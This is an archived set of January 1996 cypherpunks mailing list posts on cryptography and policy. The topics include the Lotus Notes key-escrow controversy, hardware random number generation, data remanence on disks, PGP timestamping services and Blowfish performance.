4,855,690 by Dias, assigned to Dallas Semiconductor Corp., "Integrated 
Circuit Random Number Generator using sampled output of variable 
frequency oscillator."

I'd suggest using Johnson noise; reverse-biased diodes generate noise 
which is pink.  Ive built devices using amplified Johnson noise, squared 
up with a comparator, then averaged by a D flip-flop.  The preliminary 
results look pretty good.  

Please post your results here -- and good luck. 

John A. Thomas
jathomas@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 20 Jan 96 08:33:39 PST
To: cypherpunks@toad.com
Subject: QLG_ate
Message-ID: <199601201633.LAA19074@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Two articles comment on the creation of a quantum logic
   gate by NIST researchers, as reported in Physical Review
   Letters recently:

      "Quantum leap for code-cracking computers," Mark Ward,
      New Scientist, 23 Dec 95.

      "Approaching the Quantum Gate," David Voss, Science, 12
      Jan 96.


   QLG_ate












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 22 Jan 96 19:11:22 PST
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: NOISE.SYS Stupid Bugs w/Int13h
Message-ID: <199601230207.SAA05626@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an unpleasant bug in NOISE.SYS, BTW.  It doesn't properly
return the flags from the Int 13h handler, so disable that for now
unless you'd like to do funky things to your disks.

Sorry 'bout that.

Rob.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 21 Jan 96 15:44:22 PST
To: cypherpunks@toad.com
Subject: Innaresting Fortune article on "Garbage Goodfellas" in NYC
Message-ID: <Pine.ULT.3.91.960121152852.10744D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


January 15th Fortune (don't normally read it, but I picked up a free copy)
has a lengthy and evidently well-researched article bylined Richard Behar
on the efforts of BFI, a large regional trash hauler and recycler, to
break into the (by most accounts) Mafia-controlled garbage collection
industry in New York City. 

Cypherpunk relevance: BFI is cooperating closely with the DA in helping to
prosecute its allegedly mob-affiliated competitors, which raises a lot of
very interesting questions, for which I have yet to formulate any answers.
Also a sidenote about how NYC's disclosure laws actually aid organized
crime by helping the various bosses track who owns what territory. 

Electronic surveillance. Money laundering. Steganography (sending messages
by way of the disembodied head of a dog). Open access to information and
free-market capitalism versus violent bozos, with and without uniforms.
Pen trumps sword. 

Rich says check it out.
-- 
Rich Graves
Fucking Statist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@quito.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 21 Jan 96 13:45:22 PST
To: cypherpunks@toad.com
Subject: Re: Hack Lotus?
Message-ID: <199601212142.QAA06506@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9601200326.AA09366@toad.com>, Peter Trei <trei@process.com> wrote:
> > > If they're nasty, they'll check on the receiving side as well, to
> > > ensure that the LEAF and/or the espionage-enabling key have not been
> > > patched in the sending 'International' version.
> > 
> > Nearly impossible. Why? Because they can only include the public key,
> > and not the private key, of the GAK authority in the code. You can
> > encrypt the three bytes of key, but it is very hard for a receiver
> > other than the govvies to read them. There is no shared secret
> > information or private information available, ergo, they can't check
> > their LEAF equivalent.
> 
> Think it through. 
   [suggesting that Alice encrypts 24 bits of key under NSA's public key,
    Bob repeats calculation and checks that the two LEAFS are the same]
> Thus, you can prevent a non-complying copy  of Lotus from talking to 
> a complying copy of Lotus, which is one of the goals of the GAKers.

No, you're wrong, the process you've described does not work.

Note that RSA normally is used as probabilistic encryption: encrypt the
same plaintext twice, and you'll likely get two different ciphertexts.
Thus, if RSA is used in the normal probabilistic way, the receiver can't
tell whether the sender was compliant.

Now you might suggest that the sender should not include probabilistic
padding, and use RSA deterministically, so that (somehow) the receiver
can check whether those 24 bits are correct.  That again won't work,
since a third-party eavesdropper will be able to do a 2^24 brute force
calculation to recover those 24 bits.

There are complicated ways to prevent a non-compliant copy of Lotus from
inter-operating with a compliant copy (as others on cypherpunks have kindly
pointed out), but they are complicated, and would require a re-design of
Lotus Notes' encryption module.  Since the export version is interoperable
with the non-export version, this would seem to require too much foresight
and work to be very likely.

In any event, I've heard that the export version of Lotus Notes 4 always
sends a LEAF, but the receiver never checks it.  So I think a simple binary
patch to change the NSA's public key should work.

P.S.  So does anyone know how large the NSA's public LEAF key is?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQKzSyoZzwIn1bdtAQF/zAGAxODShPqrBQLsWzRVAkW7+jbVJidQIF5q
1Jyisn2EedTQoBLHnZD7ojnmws807XZK
=bRAO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sun, 21 Jan 96 18:43:58 PST
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
In-Reply-To: <ad266bbe08021004727d@[205.199.118.202]>
Message-ID: <199601220243.SAA24710@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:

> Much more expensive would be various electron microscope-based imaging
> methods to directly image the domains and extract subtle signs of past
> write cycles.

I recently took a tour of Park Scientific, the scanning-probe
microscopy people, in Sunnyvale.  One of their demo-stations
showed a small portion of a hard disk (taken with an AFM
tip fitted with a small magnet to generate the force).  Most
impressive.  (I did look closely at the edges of the track,
but saw no sign of previous writes.)

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jan 96 19:57:51 PST
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
Message-ID: <m0teD3N-00090UC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:56 PM 1/21/96 EST, Dr. Dimitri Vulis wrote:
>tcmay@got.net (Timothy C. May) writes:
>> >Degaussing the media (running a household magnet over it :-) may be an 
optio
>>
>> Ordinary household magnets fail for a couple of reasons:
>
>I've just established experimentally that thoroughly running a household 
magnet
>over a 3.5" floppy messed up less than 1/2 the sectors I tried to read.

Was that with the floppy in the case, or with the case popped open...
Also:  Did you rotate the disk physically to expose the data normally 
partially shielded by the door slider?

And was it an ordinary ferrite magnet, or an alnico, or...?

>Not a good option even for floppies.

Ditto!

>(Actually, there _was a smiley up there)

Yes, I noticed. <G>
[stuff deleted]


>Jim Bell mentioned the trick of hiding information into 'extra' tracks and
>sectors not used by the usual DOS formatting. It's very old too.

I will admit that at this point, even calling it a "trick" is giving it 
excessive credence.

Actually, I think it wasn't really used initially for "data hiding" 
purposes.  I'm talking about the early days of CP/M and other such systems, 
circa 1977 and such, when individuals "discovered" that floppy drives had no 
hard mechanical stop past the "last" good track, and they "stole" a few 
percent of extra capacity from a floppy by simply ignoring the recommended 
"last" track.  Naturally, it would work okay on some drives but not on 
others... which is why it was a bad idea.

In addition, I also discovered that it was possible to put a few more than 
26 sectors on each track of an 8" single-density (240 kilobytes!) floppy 
disk.  The main problem with using 
these "tricks" is that the floppy had no method of conveying formatting 
information to the system it was in, which meant that any floppy using this 
trick was by definition non-standard.  ("feature" or "bug" depending on your 
goal...)


> I think I saw
>copy protection schemes circa 1982 that hid important data on tracks 41--43.
>360K diskettes normally had 40 tracks. If the diskette was copies by DISKCOPY,
>it didn't know about the extra tracks, and the copy didn't have the info
>(usually, a piece of the program). It's very easy to do with just BIOS 
calls to
>format/read/write the track. Problem is, many cheap floppy drives these days
>aren't capable of seeking beyond track 80 when the FDC asks them to. You can
>write the data there and give the floppy to a friend who won't be able to read
>it from there.

I started building my own 12.5 MHz Z-80 -based CP/M system in 1978, fully 
designed and wire-wrapped by myself, and wrote my own BIOS.  (Used a WDC 
1791 FDC)  Had total 
control.  I didn't try this trick even then because of compatibility 
reasons, but one thing I _DID_ do was to write a floppy formatter that 
"undid" the 6-sector skewing that standard CP/M had to do to keep up with 
the data read/write. (in other words, I physically re-skewed the sector 
numbering to make the next "desired" sector come faster...) I ended up with an 
effective skew-factor of 2.  Even a skew factor of 1 worked on my system (no 
skew at all), but the problem was that when I gave the most extreme of these 
oddly skewed floppies to my friends with 8" floppies, they took A LONG TIME 
to read the data!  (Their systems always missed the next sector because their 
systems were too slow, so they only ended up being able to read one sector 
per disk rotation.)

All this helps to explain why I asked if PGP had ever been ported to CP/M.  
Nostalgia!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQMF6vqHVDBboB2dAQG1+QP7BpyrLaVbTJISLo12rWMo9sqyfwtpv6A2
r7GGTvQTw6MwACA3pTh6HnnjpllveQSznNLpHaUeEjfpQX9NUXuJc4Z63E+EBFYw
Xp3c0rygdC4fHS2WJbrhn0JUpC1C5V+Cn/oEpL5qygfaoqE1mAvsw7cCAht44ne+
/dJvdnm+N9M=
=CbtQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@connobj.com>
Date: Sun, 21 Jan 96 18:08:53 PST
To: cypherpunks@toad.com
Subject: Re: The Lotus Position
Message-ID: <2.2.32.19960122012052.006d87c0@mail.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 23:17 01.19.1996 -0800, Timothy C. May wrote:
>Like many, I take it for granted that 40-bit RC4 can be broken for "small
>change." Moreover, my guess is that foreign traffic is routinely cracked if
>it is encrypted.

On Friday morning, Whit Diffie took five minutes to announce a report that
he and other big names (including Rivest, Wiener, etc.) produced a week or
two ago in Chicago.  The subject of the report was recommended minimum
symmetric key lengths... the paper should be published at http://www.bsa.org
(Whit threatened them if they didn't get it up by Monday morning<g>, but the
BSA site currently just says that they'll add a pointer to the report within
the next week).

To avoid keeping everyone in suspense, here's the basic result Diffie
announced: the world's leading cryptographers (outside the walls of the NSA)
agree that 75-bit keys are the minimum (I think this was for protecting
commercial communications).  To build in time-sensitivity, add one bit per
year... i.e. if the information needs to be kept secret for 20 years, use at
least 95 bits.

That said, talk to the NSA about 40-bit keys -- and to Lotus about its max.
64-bit keys, for that matter!  When he made the announcement on Wednesday
morning, Ray Ozzie (of Notes fame) knew he might get flak about keeping
Notes at 64 bits, so as soon as he mentioned it he added a phrase something
like (going from memory) 'but let's leave aside for now the question about
whether 64 bits is enough.'  Interesting comment in light of Diffie et al's
answer announced two days later. :-/

In answer to a question from the floor, Ozzie did say that yes, the
agreement reached with the NSA was scalable -- IOW, that you could use
128-bit keys and give the government 88 of them, instead of 64-and-give-24
-- but in retrospect I wonder whether keeping Notes at 64 bits was a
condition of the NSA deal.  I'm not normally a conspiracy theorist, but
considering that Ray was clearly aware that the 64-bitness was going to
raise eyebrows and still somehow didn't get around to simply strengthening
it...  well, it makes you wonder.

>And in a few years, 40-bit RC4 will be even more ludicrously weak.
>
>The Lotus position is untenable.

Hear hear... but unfortunately industry doesn't seem to "hear hear" well
enough yet, though they've been learning lately.  Instead of hammering
Markoff for his NYT articles, we should be thanking him that at least he's
helping to raise public awareness -- even if he does tend to overplay things.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter (herbs@connobj.com)

Connected Object Solutions     2228 Urwin - Suite 102     voice 416-618-0184
http://www.connobj.com/      Oakville ON Canada L6L 2T2     fax 905-847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jan 96 20:53:20 PST
To: Peter Monta <cypherpunks@toad.com
Subject: Re: Wipe Swap File
Message-ID: <m0teDrp-0008yBC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:43 PM 1/21/96 -0800, Peter Monta wrote:
>Tim May writes:
>
>> Much more expensive would be various electron microscope-based imaging
>> methods to directly image the domains and extract subtle signs of past
>> write cycles.
>
>I recently took a tour of Park Scientific, the scanning-probe
>microscopy people, in Sunnyvale.  One of their demo-stations
>showed a small portion of a hard disk (taken with an AFM
>tip fitted with a small magnet to generate the force).  Most
>impressive.  (I did look closely at the edges of the track,
>but saw no sign of previous writes.)
>Peter Monta   pmonta@qualcomm.com

While I admit that I'm not particularly familiar with modern hard disk head 
design, I think it is futile to look for data in this way.  If they "tunnel 
erase" the edges of the data track, even small misalignments will not allow 
remnants of data to remain.  (And I assume that "all" modern hard disk 
drives employ high-precision data-read feedback mechanisms to maintain track 
alignment down to the submicron level...  thermally-sensitive stepper motors
and linear positioners of the 1980's are (or at least should be) gone!)

Further, modern read-channel techniques (PRML; partial response, maximum 
likelihood) bring the normally readable signal closer to the noise level 
than ever before, and the PREVIOUSLY written signal is that much more 
difficult to resurrect.  

As a method for gathering intelligence on anyone, I think that this is dead 
and buried.

However, I _still_ want to see brainless operating systems like MSDOS 
changed to erase (zero) allocated  data buffers before and after use (and 
especially before re-use!), so that parts of vital files don't accidentally 
get written to the ends of other files.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Sun, 21 Jan 96 18:30:14 PST
To: cypherpunks@toad.com
Subject: Re: "Trustworthy" PGP Timestamping Service ??
Message-ID: <2.2.16.19960122023012.30973cd0@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:42 PM 1/21/96 -0800, Timothy C. May wrote:
>At 6:51 PM 1/21/96, Matthew Richardson wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>
>>I have recently setup a free PGP timestamping service which operates
>>by email.
>>
>>The objective of the service is to be able to produce "trustworthy"
>>timestamps which cannot be backdated without detection.  It achieves
>>this by:-
>>
>>(a)  giving every signature a unique sequential serial number;
>>
>>(b)  every day making a ZIP file of that day's detached signatures
>>and feeding the ZIP file back for signing (and hence the assignment
>>of another serial number);
>...
>
>It sounds like a variant of the Haber and Stornetta work on digital
>timestamping, about which much has been written on our list (check the
>archives, and/or sections of my Cyphernomicon).
>
>They have a company, Surety, which is doing this (or was, last time I heard).
>
>www.surety.com will get you there.
>
>My hunch is that your scheme implements a version of a hash (the idea of
>hashing the doc and then publishing the hash as a "widely witnessed event,"
>in Haber and Stornetta terms) that could infringe on their patents
>(assuming they applied, as I recall hearing they did).
>
>Before you go much further on this, it would behoove you to check on what
>they are doing and on what patents, if any, you might need to license.
>
>--Tim May
>
>Boycott espionage-enabled software!
>We got computers, we're tapping phone lines, we know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^756839 - 1  | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>
>
What was the web page for the first mentioned service?
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Sun, 21 Jan 96 19:59:49 PST
To: cypherpunks@toad.com
Subject: THE MIND OF A SERIAL HACKER
Message-ID: <2.2.32.19960122035939.002dde6c@isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


Thought you might find this of interest.

From PATHFINDER Compass Issue 3:

*  THE MIND OF A SERIAL HACKER: Kevin Mitnick was cyberspace's most wanted
hacker.  But while Mitnick's alleged crimes have been publicized, his story
has never been told.  Until now.  Chat live with Jonathan Littman, author
of THE FUGITIVE GAME: ONLINE WITH KEVIN MITNICK on Monday, January 22nd at
2:00 pm (EST).

http://pathfinder.com/Chat/chat.html

Lou Z.

Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzBLJocAAAEEAMlDzYJPYq0pvfMuSiKU0Y65L2nJql+qEJHYGjO5Pys4prDw
YW1ooPWaqrPQAy/eyqrM7I9KNFDCtmaPxtgcPw2oEDfc/w6cPkrVzvovKLfHQvtg
V/hHUekptSf6j525omrVAoM9MxVL3sEGCjn9VrTeC3h9upkfntHOJeL88i2NAAUR
tB5Mb3UgWmlya28gPHppcmtvbEBkYXRhdGVrLmNvbT4=
=Qlxm
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Jan 96 23:33:26 PST
To: cypherpunks@toad.com
Subject: Re: Wipe Swap File
Message-ID: <v02120d00ad28ece6b721@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:27 1/21/96, jim bell wrote:

>However, I _still_ want to see brainless operating systems like MSDOS
>changed to erase (zero) allocated  data buffers before and after use (and
>especially before re-use!), so that parts of vital files don't accidentally
>get written to the ends of other files.

Not only DOS suffers from this problem. The MacOS does as well. All 'wipe
unused space' utilities for the Mac fail on a typical hard drive to
overwrite several hundred kB of data. Few people seem to care that the OS
fills the unused parts of the last block of a file with whatever happens to
be in the buffer.

Not good.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 21 Jan 96 23:40:40 PST
To: cypherpunks@toad.com
Subject: Re: Hassles taking App. Crypt. to Taiwan?
Message-ID: <199601220740.XAA07983@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 1:49 PM 1/21/96, Daniel A. Monjar wrote:
>>I've lurked for quite a while now.  It is time to ask my first newbie
>>question.  I'll be going to Taiwan for three weeks in March.  Is there
>>likely to be any problems at US or Taiwan customs  if I take
>>Applied Cryptology 2/e along for personal study?

The first edition of Applied Cryptography has explicit permission to be
exported, thanks to Phil Karn.  It's not clear that he needed to ask,
except as a setup for asking permission to export the same material
on floppy disks; books normally get lots of slack because they look
surprisingly like the kind of thing the First Amendment covers.
(It's also not clear that he _didn't_ need to ask, given Dan Bernstein's
attempts to get official permission to teach cryptography.)

>On the Taiwan side, though, they may wonder why you brought an expensive
>U.S.-printed copy when you get the special rice-paper edition of "Applied
>Cryptography, 2nd Ed." for the equivalent of $2.25 in Taipei's book stalls.

If this were Singapore, they might consider it subversive literature,
because it is :-)  Don't know about Taiwan; you can tell them it's a computer
textbook or math textbook if they ask any questions.  Rice-paper editions
of books are especially good if you need to eat them in a hurry when the
Feds are raiding you....
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 21 Jan 96 22:06:48 PST
To: cypherpunks@toad.com
Subject: VTW: "Lotus blinks in industry/NSA crypt standoff"
Message-ID: <Ul0mYMu00YUr4SqrEG@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


===========================================================================
                               VTW BillWatch #33

       VTW BillWatch: A weekly newsletter tracking US Federal legislation
     affecting civil liberties.  BillWatch is published at the end of every
        week as long as Congress is in session. (Congress is in session)

                   BillWatch is produced and published by the
                 Voters Telecommunications Watch (vtw@vtw.org)
                             (We're not the EFF :-)

                 Issue #33, Date: Mon Jan 22 00:42:06 EST 1996

     Do not remove this banner.  See distribution instructions at the end.
___________________________________________________________________________

TABLE OF CONTENTS
        Announcements

        Oregon ISPs stand up for your rights

        Recap of ECHO Virtual Culture Event 1/21/96

        Lotus blinks in industry/NSA crypt standoff

        Subscription Information (unchanged since 10/21/95)

___________________________________________________________________________
ANNOUNCEMENTS

Each week never fails to bring us some interesting development in the
world of telecommunications and civil liberties and this one is no different.

Keep an eye on http://www.vtw.org/.  We'll be posting
an alert on the New York State cyberporn bill later tonight.  Also, if
you haven't yet scheduled a meeting with your legislator and your local
ISP to talk about the Exon bill, you're wasting valuable time.  Do so now!

Shabbir J. Safdar
Advisory Board Member
Voters Telecommunications Watch

This issue can be found in HTML form at
URL:http://www.vtw.org/billwatch/issue.33.html

___________________________________________________________________________

[...]

LOTUS BLINKS IN INDUSTRY/NSA CRYPT STANDOFF

It's not clear why this hasn't made a larger impression on the net yet,
because we think its of crucial importance in the ongoing debate about
cryptography.

For years since the original introduction of the Clipper Chip, the
debate over cryptography has continued to gain momentum.  Recently,
the Administration, embarrassed by its defeat over the Clipper Chip
proposal, put forth it's Commercial Key Escrow proposal.  What is
all the fuss about?

It's about cryptography, and who has the right to encrypt information
and who has the right to keep the key.  Right now, you do, but that
could all change.

Think of cryptography as a really good front door on your house or
apartment.  The door key is yours to hold, isn't it?  It's your right
to give a copy to someone you trust, or if you choose, nobody at all.

The Administration contends that this is not so.  With their "commercial
key escrow" scheme, they contend that you shouldn't be able to build a
door they cannot break down, but they also contend that they should be
able to order you to give a copy of the key to a government-approved
individual, so that they can come enter your house (with a warrant, of
course) when they wish.

Industry, of course, panned this plan when it proposed late 1995, and
continues to object to it.  All the while, a standoff continues:
the Administration refuses to allow cryptographic software with keys
longer than 40 bits to be exported, and industry refuses to build Big
Brother into their products.

And this is where the standoff stayed until last Wednesday, when
Lotus blinked.

On Wed, Jan. 17th, 1996, Lotus announced that it had increased the key
length of its International version of the Lotus Notes product to 64
bits.  They did this by building in a back door for the Administration to
use to decrypt any international traffic that it might desire to read.

Although there are a lot of reasons why we think this is a terrible idea,
the first one that springs to mind is the fact that the one public key that
Lotus has embedded in all their software is a single point of failure
for every International Lotus user throughout the world.  Sure, this key
is held with a high security clearance by the government, but then
Aldritch Ames also had some of the most sensitive information available
to him, and he proved untrustworthy.

After all, if $1.5 million can buy a CIA counter-intelligence agent, I
wonder how much a Lotus Notes key escrow holder goes for these days?

You can find a copy of the Lotus press releases at
http://www.lotus.com

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sun, 21 Jan 96 23:01:04 PST
To: cypherpunks@toad.com
Subject: Why is blowfish so slow?  Other fast algorithms?
Message-ID: <199601220700.CAA13713@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


First, can someone tell me if the latest version of blowfish (the one
in Applied Crypto 2nd edition) is available online somewhere?  I
looked at a bunch of crypto ftp servers and could only find an older
version of blowfish that did not have the blf_ctx structure allowing
multiple keys to be active at a time.

More importantly, however, on a 120 MHz Pentium, the old blowfish
(compiled with gcc version 2.7.2 optimization -O6) seems to take about
12.6 microseconds for 1 M encryptions and decryptions, which works out
to about 95 cycles per byte.  This is significantly more than the 26
cycles/byte number cited in Applied Crypto 2nd edition.

Can anyone suggest what I might do to speed this up?

Failing that, can anyone suggest other secure, preferably unpatented,
shared-key encryption algorithms that could encrypt at ethernet speeds
(1 MByte/sec) without using most of the CPU on a fast Pentium or
equivalent processor?

Thanks a lot,
David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 21 Jan 96 18:32:13 PST
To: Wei Dai <Cypherpunks@toad.com>
Subject: Re: HAVAL (was Re: crypto benchmarks)
Message-ID: <199601220235.VAA11495@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jan 1996 01:29:49 -0800 (PST), you wrote:

[..]

Now, the *big* question is... any new cryptanalysis that sheds light
on the security of HAVAL? (I haven't yet gotten AC2 if there's info in
there.)  Email to one of the authors of HAVAL said he knew of nothing
but that a recent attack on MD5 didn't apply.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 21 Jan 96 18:35:10 PST
To: cypherpunks@toad.com
Subject: [NOISE] Re: mailing list
Message-ID: <199601220238.VAA11551@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jan 1996 17:35:50 -0500 (EST), someone wrote:

>You come recommended by the Happy Mutant Handbook. Was just wondering 
                                                ^^^^^^^^^^^^^^^^

Uh-oh. I have nothing to do with that.

More fodder for Alta-Vista....







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chih-Wei Chang  <cwchang@cs.tamu.edu>
Date: Mon, 22 Jan 96 01:44:20 PST
To: cypherpunks@toad.com
Subject: Re: Hassles taking App. Crypt. to Taiwan? (fwd)
Message-ID: <199601220943.DAA23213@photon.cs.tamu.edu>
MIME-Version: 1.0
Content-Type: text/plain



> >On the Taiwan side, though, they may wonder why you brought an expensive
> >U.S.-printed copy when you get the special rice-paper edition of "Applied
> >Cryptography, 2nd Ed." for the equivalent of $2.25 in Taipei's book stalls.
> 
> If this were Singapore, they might consider it subversive literature,
> because it is :-)  Don't know about Taiwan; you can tell them it's a computer
> textbook or math textbook if they ask any questions.  Rice-paper editions
> of books are especially good if you need to eat them in a hurry when the
> Feds are raiding you....

     There will be no problem to bring it to Taiwan. I think you
     can buy a cheaper one at Taipei, but not as cheap as $2.25.
     Everything there is very expensive now, except books.
     Unfortunately, they are not rice-paper editions. You will have a
     hard time to eat them.

-- 
============================================================================
Name   : Chih-Wei Chang (Ray)        Computer Science, Texas A&M University,
E-mail : cwchang@cs.tamu.edu         College Station, TX-77843-3112, USA.
============================================================================



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 21 Jan 96 20:04:42 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Trustworthy" PGP Timestamping Service ??
In-Reply-To: <ad27fbf00302100409e3@[205.199.118.202]>
Message-ID: <31030b34.44240810@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Jan 1996 15:42:32 -0800, Timothy C. May wrote:

> At 6:51 PM 1/21/96, Matthew Richardson wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >I have recently setup a free PGP timestamping service which operates
> >by email.
> >
> >The objective of the service is to be able to produce "trustworthy"
> >timestamps which cannot be backdated without detection.  It achieves
> >this by:-
> >
> >(a)  giving every signature a unique sequential serial number;
> >
> >(b)  every day making a ZIP file of that day's detached signatures
> >and feeding the ZIP file back for signing (and hence the assignment
> >of another serial number);
> ...
> 
> It sounds like a variant of the Haber and Stornetta work on digital
> timestamping, about which much has been written on our list (check the
> archives, and/or sections of my Cyphernomicon).
> 
> They have a company, Surety, which is doing this (or was, last time I heard).

They were a month ago, at least.  Their patent was re-issued 5/30/95
(# R34,954).

> www.surety.com will get you there.
> 
> My hunch is that your scheme implements a version of a hash (the idea of
> hashing the doc and then publishing the hash as a "widely witnessed event,"
> in Haber and Stornetta terms) that could infringe on their patents
> (assuming they applied, as I recall hearing they did).

I would be very surprised if it did.  Haber & Stornetta's work is
based on building a tree of hashes for all documents within a given
time period (1 second in their commercial service), and then chaining
the hashes for successive time periods.  Once a week they publish one
hash from the chain in the New York Times, and have been doing so for
many years.  The certificate apparently consists of the hashes from
the root of the tree to your document, plus one hash for each branch
not taken along that route.  This permits you to verify that the hash
for the time period was indeed partially derived from the document in
question.  As I understand it you then have to check the chain of
hashes for the week, and verify that the ending hash matches the
published value.

To make this whole process more secure, they use a 288 bit hash
created by concatenating an MD5 hash and an SHA hash.

There is no digital signature involved and no information which must
be kept private -- only the hashes.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Mon, 22 Jan 96 05:06:45 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <QQzzoa03795.199601220200@relay3.UU.NET>
Message-ID: <960122.061235.3y2.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, someone wrote:

> Note that RSA normally is used as probabilistic encryption: encrypt the
> same plaintext twice, and you'll likely get two different ciphertexts.

I think you're confusing PGP's use of random session keys and random
padding with actual RSA encryption.  Using RSA alone on a given
plaintext will always give you the same ciphertext.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQN/6Rvikii9febJAQGCwwP+LGSeA56pCk9kFIULEuNX9B7VxBV5oYho
y2JsyjdrJayUzVDS6iqhzFSrHHM8QSq3C3MlAmriXx52BdbFOZZ6lduV35hZKAjb
TELDjeKixe/8BiDajP+98XcOSABqhTgvG/QgXV12dyuvr6uJETw8v1m5VkHH+svn
BElJdmt5ZL8=
=Dc+e
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
